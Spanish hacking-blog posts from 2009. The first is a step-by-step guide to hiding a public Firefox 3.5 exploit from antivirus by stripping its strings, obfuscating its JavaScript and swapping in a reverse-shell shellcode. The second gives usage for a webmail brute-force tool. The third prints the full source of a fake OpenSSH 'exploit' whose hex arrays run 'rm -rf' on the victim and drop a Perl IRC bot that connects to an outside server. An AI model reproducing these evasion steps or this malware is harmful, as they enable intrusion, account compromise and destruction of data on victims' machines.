Si nos fijamos, el exploit contiene los siguientes strings. Todos ellos hay que quitarlos, ya que algún antivirus puede haberlos usado para identificarlo (pese a lo que digan, las heurísticas no se usan demasiado):

Firefox 3.5 Vulnerability
Firefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload


Y, por supuesto, todas las referencias a milw0rm.com hay que quitarlas también (hay una al final del todo).

PASO 2: ofuscar el código javascript.

Antes de nada, vamos a comprobar que, realmente, nuestro antivirus detecta el exploit. Bajamos el código de milw0rm, lo guardamos como exploit.html y lo intentamos abrir ...



Lo que haremos será ofuscar el código javascript con una herramienta online, una cualquiera, y guardar de nuevo exploit.html. Para ofuscarlo, he elegido ésta herramienta, pero basicamente cualquiera servirá.



Una vez ofuscado:



Y ahora repetimos el proceso: guardamos el código como exploit.html, sustituyendo el javascript por el OFUSCADO y quitando los strings que hacen referencia a que esto es un exploit, lo ejecutamos ... ¡¡y no nos detecta el antivirus!!



El paso final, sería substituir el shellcode de calc.exe por el de una shell inversa, por ejemplo:

char code[] =
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"
[...]


Esta shell puede bajarse de metasploit. Una vez bajada la shell, la pegamos en el exploit original substituyendo a la de calc.exe y ofuscamos todo el javascript con la herramienta online.

Como habéis visto, es relativamente sencillo ofuscar un exploit en un lenguaje complejo, como pueda ser javascript, para que el antivirus no lo detecte.

Fuente: Hacking-Avanzado

Saludos
Dr.White

jueves, 23 de julio de 2009

Pen-Test tool: WMAT - pen test a webmail

Esta tool recien la voy a probar pero he oido muy buenas cosas de ella espero que ustedes lo puedan probar y dar su opinion comentando.

USO:


-u usernames_file required (except in passsorter mode)
-p passwords_file required (except in passsorter mode)
-t timeout in seconds !required
-w output_file !required
--url Webmail URL required
--pattern pattern_xml required
--bell Bell on success !required
--proxy Proxy[IP:PORT] !required"
--proxyup Proxy UP [username:password] !required
--passsorter File or Email address !required
Examples:
python wmat.py -u usernames_example.txt -p passwords_example.txt --url webmail.domain.tld --pattern patterns/dummy.wmat.xml


Mas Info: aqui
descarga: aqui


Pen-Test tool: WMAT - pen test a webmail

Esta tool recien la voy a probar pero he oido muy buenas cosas de ella espero que ustedes lo puedan probar y dar su opinion comentando.

USO:


-u usernames_file required (except in passsorter mode)
-p passwords_file required (except in passsorter mode)
-t timeout in seconds !required
-w output_file !required
--url Webmail URL required
--pattern pattern_xml required
--bell Bell on success !required
--proxy Proxy[IP:PORT] !required"
--proxyup Proxy UP [username:password] !required
--passsorter File or Email address !required
Examples:
python wmat.py -u usernames_example.txt -p passwords_example.txt --url webmail.domain.tld --pattern patterns/dummy.wmat.xml


Mas Info: aqui
descarga: aqui


Falso Remote Exploit por Anti-Sec para SSH


A estas alturas todos hemos oído hablar del grupo "anti-sec", famoso por hackear imageshack, blackhat-forums y astalavista, aparte de amenazar con hackear milw0rm.



Y, como sabréis, hubo rumores de que había un 0-day para openssh y que era el usado por anti-sec para hacerse con estos sitios. De hecho, desde hace una semana o así, ha habido un considerable aumento en escanos del puerto 22.

El 0-day, que en realidad un script que destroza el OS, es éste:


* ---------------------------
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";


char fbsd_shellcode[] =
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
"\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
"\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");
printf(" Usage: %s -h -p port\n",arg);
printf(" Options:\n");
printf(" \t-h ip/host of target\n");
printf(" \t-p port\n");
printf(" \t-d username\n");
printf(" \t-B memory_limit 8/16/64\n\n\n");
}

#define FD 0x080518fc
#define BD 0x08082000

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;

if (geteuid()) {
puts("need root for raw socket, etc...");
return 1;
}

if(argc < 3){
usage(argv[0]);
return 1;
}


printf("\n [+] 0wn0wn - by anti-sec group\n");

if (!inet_aton(h, &addr.sin_addr)){
host = gethostbyname(h);
if (!host){
printf(" [-] Resolving failed\n");
return 1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}

sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf(" [-] Connecting failed\n");
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,"w+");
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,"%s",shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf(" [-] connecting failed\n");
}

payload[sizeof(payload)-1] = '\0';
payload[sizeof(payload)-2] = '\0';
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
/* v--- our cool bar that says: "r0000000t!!!" */
printf("\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
fremote("PS1='sh-3.2#' /bin/sh");
}
else
printf(" [-] failed to exploit target :-(\n");
close(sock);
return 0;
}


He quitado los includes del principio para que no compile, así a nadie se le ocurrirá ejecutarlo.

Fuente: Hacking-Avanzado

Saludos
Dr.White